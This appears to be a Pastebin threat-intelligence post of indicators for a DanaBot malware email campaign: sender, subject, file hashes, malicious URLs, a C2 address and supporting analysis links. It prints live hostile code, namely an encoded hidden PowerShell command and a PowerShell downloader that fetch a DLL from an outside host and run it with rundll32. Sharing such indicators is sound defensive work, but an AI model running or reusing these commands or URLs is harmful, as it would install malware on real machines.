Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- THREAT IDENTIFICATION: DANABOT
- SUBJECTS OBSERVED
- Study the report very urgently - hV8W
- SENDERS OBSERVED
- raymak825@netvigator.com
- ATTACHED MALDOC FILE HASHES
- 9789789.zip
- e2dd6e94fcc2851d7e2258c8abe1faf5
- Which contains:
- 12.08 - Reports.js
- aeeef159543b28995b1f742085a2c6a0
- POWERSHELL COMMAND FROM THE MALDOC
- poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAG8AbgB1AHMAZQBzAGYAbwB1AG4AZAAuAG0AbAAvAHUAcABkAGEAdABlAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
- NEXT LEVEL MALDOC DOWNLOAD URL
- http://www.bonusesfound.ml/update/index.php
- This returns:
- $path = $Env:temp '\ZGOPQv.bin'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://www.bonusesfound.ml/update/update.dll',$path); C:\Windows\System32\rundll32.exe $path,S
- DANABOT PAYLOAD DOWNLOAD URL
- http://www.bonusesfound.ml/update/update.dll
- DANABOT PAYLOAD FILE HASHES
- update.dll
- c00d207efb855910154389b48404e550
- Also was renamed to:
- AppData\Local\Temp
- JWScY.bin
- c00d207efb855910154389b48404e550
- DANABOT C2
- From the rundll process
- https://192.52.167.44
- SUPPORTING EVIDENCE
- https://www.virustotal.com/gui/file/716e5a3d29ff525aed30c18061daff4b496f3f828ba2ac763efd857062a42e96/detection
- https://app.any.run/tasks/042cafaf-f432-4332-8356-c3e04b55b701/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement